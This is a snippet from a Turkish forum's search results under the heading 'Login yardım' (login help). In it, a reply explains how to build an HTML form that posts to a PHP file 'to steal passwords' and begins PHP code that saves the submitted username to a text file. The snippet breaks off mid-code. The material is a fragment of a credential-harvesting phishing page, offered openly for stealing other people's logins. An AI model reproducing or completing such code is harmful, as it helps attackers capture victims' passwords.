Arama Sonuçları

  1. A

    Login yardım !

    olay çok basit bir html form oluştur bu php dosyasına post ettir şifre çalacaksınız işte yani neyi geveliyorsun ki :D <?php $dosya = "kullanicilar.txt"; $deger = $_POST["kullaniciadi"]; $yazilacak_deger = "$deger\n"; if ($deger) { if (!file_exists($dosya)){ touch($dosya); chmod($dosya,0666)...
Üst